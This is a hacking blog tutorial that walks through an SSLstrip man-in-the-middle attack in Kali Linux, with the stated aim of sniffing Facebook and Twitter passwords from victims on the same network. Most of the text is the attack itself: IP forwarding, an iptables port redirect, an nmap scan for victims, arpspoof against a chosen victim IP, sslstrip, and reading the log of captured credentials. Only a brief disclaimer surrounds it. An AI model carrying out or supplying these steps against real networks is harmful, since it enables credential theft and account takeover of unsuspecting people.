How to Use SSL Strip in Kali Linux? Hack Facebook and Twitter

Howdy crackers! In this article, we're gonna cover how to use SSL Strip in Kali Linux which is a man-in-the-middle attack allows an attacker or hacker to sniff passwords. It works for HTTPS servers and therefore we can sniff passwords of Facebook, twitter etc. social sites.

Basically, the attack works in sniffing cookies. The victim will request his connection over HTTPS but the request will come to the attacker and he will setup HTTP to redirect the traffic from HTTPS to HTTP. When the traffic will redirect to HTTP we can capture the unencrypted data.

The devices you want to hack must be connected to the same network. So, let's look at the tutorial.

Step 1:

Fire up your Kali Linux Machine and let's check out with what interface we are connected to. To check that type ifconfig and hit enter. It will show up the interface you're connected to. If you're connected using ethernet cable it will show eth0 and if you're connected using a wireless network it will show wlan0.

How to Use SSL Strip in Kali Linux-crackitdown

Here we're connected using an ethernet cable. So now we're gonna do IP forwarding. To do IP forwarding give the command 

echo 1 > /proc/sys/net/ipv4/ip_forward

After this step, our 2nd step will be configuring IP Tables. This step will be used to reroute the all traffic from one part to another. To enter that part give the command 

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

So now we gonna need our gateway IP address. To know that give the command route -n and here it shown up our gateway IP address.

How to Use SSL Strip in Kali Linux-crackitdown

Step 2:

Now we're all set. Here comes the 2nd  step. We need the victim's machine IP address that connected to the same network we are connected to. You're all familiar with nmap tool. Here we're gonna use nmap tool to scan the whole network to know the IP addresses of the machines connected to the network. Simply give the command 

nmap -sS -O 192.168.49.2/24

(Replace the IP address with your Gateway IP address)

Nmap started scanning the network and it has shown up the results of the IP addresses. We're gonna take one IP address to do attack.

We picked up an IP address and now we are going to configure arpspoof to start rerouting traffic through us. Start arpspoof by giving the command without inverted commas.

arpspoof -i eth0 -t 'victim's Ip address' 'your gateway IP address'  

(ex: arpspoof -i eth0 -t 192.168.33.133 192.168.49.2)


How to Use SSL Strip in Kali Linux-crackitdown

If you're using WLAN simply replace eth0 with wlan0 in the command. So here we setup successfully the arpspoof and now we are gonna start the SSL Strip. Open up another terminal and give the command sslstrip -l 8080 which will start the SSL Strip.
How to Use SSL Strip in Kali Linux-crackitdown

Step 3:

Now we are all set. Now if the victim visits facebook login page it will redirect to HTTP and if the victim enters his username and password then you can see them by using the command cat sslstrip.log to view the captured logs of SSL Strip session.

Important Note: 

Note that it doesn't work anymore on windows 10 updated browsers. It only works on Windows 7 browsers. The updated browsers patched all their vulnerabilities. Therefore this exploit doesn't work on them.

Warning:

Don't try these on others property without the owner's permission. Hacking anything without permission and we are not responsible for any kind of damage. Do practical on your own things.
                         Hope you liked the tutorial. If this was helpful for you rate it and if you are facing any kind of problem regarding SSL Strip feel free to comment us below explaining your problem. Our team is always here for you.
CrackItDown
CrackItDown

Authored By Crack It Down Team.
A team of crackers by the heart and passionate technical helpers by mind. We work as tech help provider in various online platforms. Life Motto: Hack the world to create the world in a new way.

No comments:

Post a Comment

Leave us a comment. Your comment is valuable to us.

Note: Only a member of this blog may post a comment.